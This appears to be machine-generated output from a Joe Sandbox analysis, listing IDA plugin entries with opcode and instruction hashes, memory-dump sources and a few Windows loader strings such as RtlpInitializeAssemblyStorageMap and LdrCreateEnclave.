                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .Local\$@
                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                              • Opcode ID: 77e7b5d53da83f58145d3349ae33fc94fef043062033e4f27d71a77d7c825f7a
                                                                                                                                              • Instruction ID: 68182cf9d7c9b44d5b06d8310d71794adec4d36bc7017d64af615cc1ca4ada51
                                                                                                                                              • Opcode Fuzzy Hash: 77e7b5d53da83f58145d3349ae33fc94fef043062033e4f27d71a77d7c825f7a
                                                                                                                                              • Instruction Fuzzy Hash: 5F31A1B25097059FD711DF28C9C0A9BBBE8FBC5654F84092EF99983310DA30DE04CB92
                                                                                                                                              Strings
                                                                                                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 019F2A95
                                                                                                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 019F2A90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                              • API String ID: 0-2653619699
                                                                                                                                              • Opcode ID: 23f87ef0083fbf09a8f518a6d46b1d78127eab0294319bf4f1f544c6b3f8036e
                                                                                                                                              • Instruction ID: 7644cf51776278eafd1c3cd743054db826860898e1c41c884c6064ffecbe51de
                                                                                                                                              • Opcode Fuzzy Hash: 23f87ef0083fbf09a8f518a6d46b1d78127eab0294319bf4f1f544c6b3f8036e
                                                                                                                                              • Instruction Fuzzy Hash: FB110A75700205BBF726CA4C8E81FAB76AEAB94F54F15802D7A0CEB280D674CE0083A0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                                              • Opcode ID: f9c489b311dcc47390dde36b1c289e1b4afe44d9368d23b31dc761da31f9815c
                                                                                                                                              • Instruction ID: 7aa7f2e95ef77aef936f8da0cb0599b9cda18bfcd924261cf85ea58fe6935ca7
                                                                                                                                              • Opcode Fuzzy Hash: f9c489b311dcc47390dde36b1c289e1b4afe44d9368d23b31dc761da31f9815c
                                                                                                                                              • Instruction Fuzzy Hash: 6201ADB2240704EFE311DF14CE85B567BE8E794B15F01893DA64CC71A0E734E904CB46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dd3e6c1a724fe217b625054e19143acc1279df5b9c878cddf473fc14dfc56b38
                                                                                                                                              • Instruction ID: 7d8e04b97d0e9c4c928b0a1c04832a1ab113a74dab125aaa805aced056f2f25c
                                                                                                                                              • Opcode Fuzzy Hash: dd3e6c1a724fe217b625054e19143acc1279df5b9c878cddf473fc14dfc56b38
                                                                                                                                              • Instruction Fuzzy Hash: ADA17E71608742CFC725DF68D480A2ABBFAFF98704F24492EE58987351E730E945CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                              • Opcode ID: a3ad22fec9628111e3eb7a489622b635c1ce56a011a5ea6285afca8b7477c03a
                                                                                                                                              • Instruction ID: fb1e5d0a44cb9f64a4e52c70a794843a3b1d5b07416ed81f1d83ee798236413f
                                                                                                                                              • Opcode Fuzzy Hash: a3ad22fec9628111e3eb7a489622b635c1ce56a011a5ea6285afca8b7477c03a
                                                                                                                                              • Instruction Fuzzy Hash: 7591A471900219AFEB22DFA8DD85FAE7BB8EF44B54F100055F608AB1D0D775AD04CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0](
                                                                                                                                              • API String ID: 0-115492709
                                                                                                                                              • Opcode ID: 60097c9772df840e20cd461466e07ba11a960f7fa580e517e7ba8f3f1d00af92
                                                                                                                                              • Instruction ID: a8da8491c850409809cacb7cd785ad687536f23e37c7615054af6a897556cc75
                                                                                                                                              • Opcode Fuzzy Hash: 60097c9772df840e20cd461466e07ba11a960f7fa580e517e7ba8f3f1d00af92
                                                                                                                                              • Instruction Fuzzy Hash: A041A2B1641602EFDB22EF69C980B5ABBE8FFA0754F008469E51EDB250D770DD00CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                              • Opcode ID: 5e9ce6d3d0fa9fd7fc18dabb426bc1200d86479c676518aca7a1a2ea3c4dc72a
                                                                                                                                              • Instruction ID: 4d362e7cdf0c702b0230a1ffb2f72323a5d4d274f8a0150bf482a33cb612d82c
                                                                                                                                              • Opcode Fuzzy Hash: 5e9ce6d3d0fa9fd7fc18dabb426bc1200d86479c676518aca7a1a2ea3c4dc72a
                                                                                                                                              • Instruction Fuzzy Hash: 55418272D00229AFEB11DB99C840BEEBBBAAFC4750F05416AFE15A7650D674DE40C7B0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: kLsE
                                                                                                                                              • API String ID: 0-3058123920
                                                                                                                                              • Opcode ID: 8ccf97fd217f853118aa9e3ce67f033c0dfbf62c5a80af71bed34824c6665f44
                                                                                                                                              • Instruction ID: b6938a2bf9ee1ac1525b2e7fbc9e77c2bbe3a3a2b694a4a5ff52c31a3d692d2d
                                                                                                                                              • Opcode Fuzzy Hash: 8ccf97fd217f853118aa9e3ce67f033c0dfbf62c5a80af71bed34824c6665f44
                                                                                                                                              • Instruction Fuzzy Hash: E0417B355017628BF731ABBCED44BA53FA4BB90B24F24011DED588A0D5CB74478BC7A1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                              • Instruction ID: 978129ba019f582836a59b8269f8e73e2151f78a1f775db01e1ef8f8ba7f9fe9
                                                                                                                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                              • Instruction Fuzzy Hash: 9A41D135A0065AEBDF258F88C590BFEB7B8EF84702F00455AE94997280D770D941CBA1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx
                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                              • Opcode ID: 0eb574ef59fcec12853a48c7dfff13fe1129dc1611d81ded7559a97ce6a5339b
                                                                                                                                              • Instruction ID: b257059082d40321d11b12f3c483eba998773b8f09b7141335f95fcaf7fc5fc8
                                                                                                                                              • Opcode Fuzzy Hash: 0eb574ef59fcec12853a48c7dfff13fe1129dc1611d81ded7559a97ce6a5339b
                                                                                                                                              • Instruction Fuzzy Hash: 0A11E6303082028BFB256D0CC850A76B7D9FB81225F36892AE59ECF391D671DC46C381
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrCreateEnclave
                                                                                                                                              • API String ID: 0-3262589265
                                                                                                                                              • Opcode ID: 8f02ae2f4e2f28396d1cc33ac0eae08dd19111866f1bda349bd0a47cdb8af7dd
                                                                                                                                              • Instruction ID: 098bbcba95685449c831195aa5f2941e04de20fbff40d022a4b41e33052c11c6
                                                                                                                                              • Opcode Fuzzy Hash: 8f02ae2f4e2f28396d1cc33ac0eae08dd19111866f1bda349bd0a47cdb8af7dd
                                                                                                                                              • Instruction Fuzzy Hash: 2A2104B15183449FC321DF1AD845A9BFBE8FFD5B50F004A1EB99497250D7B0D505CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0f09a8630f06b3a180769a765c6134f637b6b1ef9310a3d77247a216689b0e38
                                                                                                                                              • Instruction ID: 994cbba42a1ffedd51547e14c88addc174c3c3c6d319fb09a4557fa82d77bd2a
                                                                                                                                              • Opcode Fuzzy Hash: 0f09a8630f06b3a180769a765c6134f637b6b1ef9310a3d77247a216689b0e38
                                                                                                                                              • Instruction Fuzzy Hash: C142C071A006168FDB19CF9DC480ABEBBB6FF88319B14C55DD95AAB340D734E842CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c8c6760fe1a8effdd04bd3d2af8582e9fce315a498f1f10d28006392ad585ae2
                                                                                                                                              • Instruction ID: 68f1634b68e1481906ba764c60108a4bbb49424ee6f1ecad75358ba7beb23ffe
                                                                                                                                              • Opcode Fuzzy Hash: c8c6760fe1a8effdd04bd3d2af8582e9fce315a498f1f10d28006392ad585ae2
                                                                                                                                              • Instruction Fuzzy Hash: F932B175E00219DBDF14DFA8C894BEEBBB5FF94714F580029E80AAB381E7359905CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9b217f31da1416b25af30a5d8dc8190129b687fdfdbb22dfe049424fab57c874
                                                                                                                                              • Instruction ID: c10435a569a13183b5ff8d606274a39656c1d7573c8b8907c902b072ca4349f1
                                                                                                                                              • Opcode Fuzzy Hash: 9b217f31da1416b25af30a5d8dc8190129b687fdfdbb22dfe049424fab57c874
                                                                                                                                              • Instruction Fuzzy Hash: E9425075E002199FEB25CF69C841BADBBF5BF88300F188199E94DEB246D7389985CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 921cdc114b5e92e3be27c433d96f4dc35d59642298fb5e25ffcc831f3b15b70b
                                                                                                                                              • Instruction ID: d63e7e562c888ab4511a31f1f2dfd675649d756292fadee86214755abef51289
                                                                                                                                              • Opcode Fuzzy Hash: 921cdc114b5e92e3be27c433d96f4dc35d59642298fb5e25ffcc831f3b15b70b
                                                                                                                                              • Instruction Fuzzy Hash: 9022CF742046718FEB25CF2DC094372BBF1AF45300F18889AE996CFA86E735E452DB64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7765d342ca859a7ba066e8d086041ef97f644eef2fcb5192442d85787d5788f0
                                                                                                                                              • Instruction ID: b5408d9c4c7c8cedaa44fbf364591ae5202bd71e0f6bdbcbcb19563e9f0cd312
                                                                                                                                              • Opcode Fuzzy Hash: 7765d342ca859a7ba066e8d086041ef97f644eef2fcb5192442d85787d5788f0
                                                                                                                                              • Instruction Fuzzy Hash: 26E18071608342CFC715EF28C490A6ABBE5FF89314F05896DE9998B351EB31E905CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8fe162261e280c01ad0675126f2a569f15fc7dfc0d5f33df382613db2e4bd308
                                                                                                                                              • Instruction ID: 5579703dc5a1d39e26c056be20065477fc958d3a4502c22347174fe646838030
                                                                                                                                              • Opcode Fuzzy Hash: 8fe162261e280c01ad0675126f2a569f15fc7dfc0d5f33df382613db2e4bd308
                                                                                                                                              • Instruction Fuzzy Hash: 0AD1F271A0020A9BDB14DF69C894FBEB7A5BF94714F058A2DEA1EDB280E730D950CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                              • Instruction ID: 42c5c4eb3653642ad46398921fd1ba9a3b40008c93126053196e1382bdba2f28
                                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                              • Instruction Fuzzy Hash: A7B10831600646EFDF16CB6DC854BBEBBFAAF84300F194559E66AD7281D730E941CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6de207f35b0050d3502751f5efa4be0d766a982c1028bf10c2dc0c5a9b4d4bf9
                                                                                                                                              • Instruction ID: b8bad45db68e885cff0f2d1fd4eb575e4bc41d3985b0e85cc4e0eb56cbee1598
                                                                                                                                              • Opcode Fuzzy Hash: 6de207f35b0050d3502751f5efa4be0d766a982c1028bf10c2dc0c5a9b4d4bf9
                                                                                                                                              • Instruction Fuzzy Hash: 32A15C71900616AFEF22DFA8CC45FAE7BB9EF85754F010054FA08AB2A0D7759D11CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
                                                                                                                                              • Instruction ID: db6e6ecba58e26da1e89be1bf6278ed5255760698ae9848f106a95b499b7137f
                                                                                                                                              • Opcode Fuzzy Hash: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
                                                                                                                                              • Instruction Fuzzy Hash: A9C17774608341CFE764DF18C494BABB7E9BF88704F44496DE98987291E774E908CFA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
                                                                                                                                              • Instruction ID: 20d49516880d82d35f72b74405e95ed15b84d5d0c4cb948e7b764c7c9a532f7d
                                                                                                                                              • Opcode Fuzzy Hash: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
                                                                                                                                              • Instruction Fuzzy Hash: C1B17170A042668BDB24CF68C890BADB7F5EF84704F0485E9D54EEB281EB71DD85CB21
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
                                                                                                                                              • Instruction ID: cce3aa701a8432023a6778e59d04f234af9f2983aab7787311fbd7b54b975db7
                                                                                                                                              • Opcode Fuzzy Hash: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
                                                                                                                                              • Instruction Fuzzy Hash: 6DA12731E006199FEB22DB6CC848FAEBBF8AF44714F150526EA08AB2D1D7749D45CBD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
                                                                                                                                              • Instruction ID: d4c18b36dcb4a327f106e48ddd4dbf69dd9f00be7afca377a87a9fa89b26c9f0
                                                                                                                                              • Opcode Fuzzy Hash: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
                                                                                                                                              • Instruction Fuzzy Hash: 0AA1D374B00616DFDB25DF69C890BAAB7B5FF44B19F08402DFA8997281EB34E811CB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
                                                                                                                                              • Instruction ID: c9ec52302627d4c70c2d0d096cf50beb193ffeab8ae59e4403fb4b8452cf5bab
                                                                                                                                              • Opcode Fuzzy Hash: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
                                                                                                                                              • Instruction Fuzzy Hash: 2FA1D172A08601EFD756DF28C980B5ABBE9FF98704F450528F989D7651E330ED81CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
                                                                                                                                              • Instruction ID: 72061d19e3558a89491193d999b1eb9870b306dcca3037864bbd26f3539b33d0
                                                                                                                                              • Opcode Fuzzy Hash: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
                                                                                                                                              • Instruction Fuzzy Hash: D791A471D00216AFDF16CFA8E894BBEBFB5AF48714F154169E618EB381D734D9108BA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
                                                                                                                                              • Instruction ID: 53b7b61829ded20f7224a6a97a8168a374f17e1f9db4747fa993cc4414d616dc
                                                                                                                                              • Opcode Fuzzy Hash: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
                                                                                                                                              • Instruction Fuzzy Hash: 8A914131A00616DBEF25DB2DC884BBEBBE5FF94B15F048469E90D9B380E634D901C792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e2ed1b9d7c7b4db483b5d00d750e0828d4d7ad522874963690b0f81b07862727
                                                                                                                                              • Instruction ID: 0ebb7bc51961619b34f49605aafadc1803f7e931e5084fbb2de8d1afc963f7b8
                                                                                                                                              • Opcode Fuzzy Hash: e2ed1b9d7c7b4db483b5d00d750e0828d4d7ad522874963690b0f81b07862727
                                                                                                                                              • Instruction Fuzzy Hash: 71B113B56093418FD755CF28C580A6AFBF1BB88704F18896EF99AC7352D331E946CB42
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bb3d29860cc91c5f5d0a6a7b894d09e478ab6e696361de052a1d531961e463b0
                                                                                                                                              • Instruction ID: 821ac9a9a87ac1948ee0b4eb0ec36644b38d387e520f2610e1d09ac3e5e11df6
                                                                                                                                              • Opcode Fuzzy Hash: bb3d29860cc91c5f5d0a6a7b894d09e478ab6e696361de052a1d531961e463b0
                                                                                                                                              • Instruction Fuzzy Hash: 18B17C74A00205CFDF25EF2CD484BB9BBB4BB8871DF248559DC299B296D731D942CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                              • Instruction ID: 15e75a35e5f05d192c354e9687d11a10d8aa53f73069df51c1b7bed81f4041cf
                                                                                                                                              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                              • Instruction Fuzzy Hash: 5C719F35A0221A9BDB21CF68C581BBEBBF7EF84750F59411AF901EB241E734D9418BB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                              • Instruction ID: eec9b44dad36efdeb0f49429426df3cc76e1f6ce96de175b6890c6c987ffe39f
                                                                                                                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                              • Instruction Fuzzy Hash: 5A817072E0011A8BDF1ACF9CC884BADBBF2FB84315F19456AD91DB7344D631A9448BD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 63d53e92217fb6666d7c4289e3dab190cf97c13676ee17ce7fac7bd31330711c
                                                                                                                                              • Instruction ID: 37f86383df437596c6c9bd7156e38665870e5be0ebf637d3ff50b90f0ae05f4a
                                                                                                                                              • Opcode Fuzzy Hash: 63d53e92217fb6666d7c4289e3dab190cf97c13676ee17ce7fac7bd31330711c
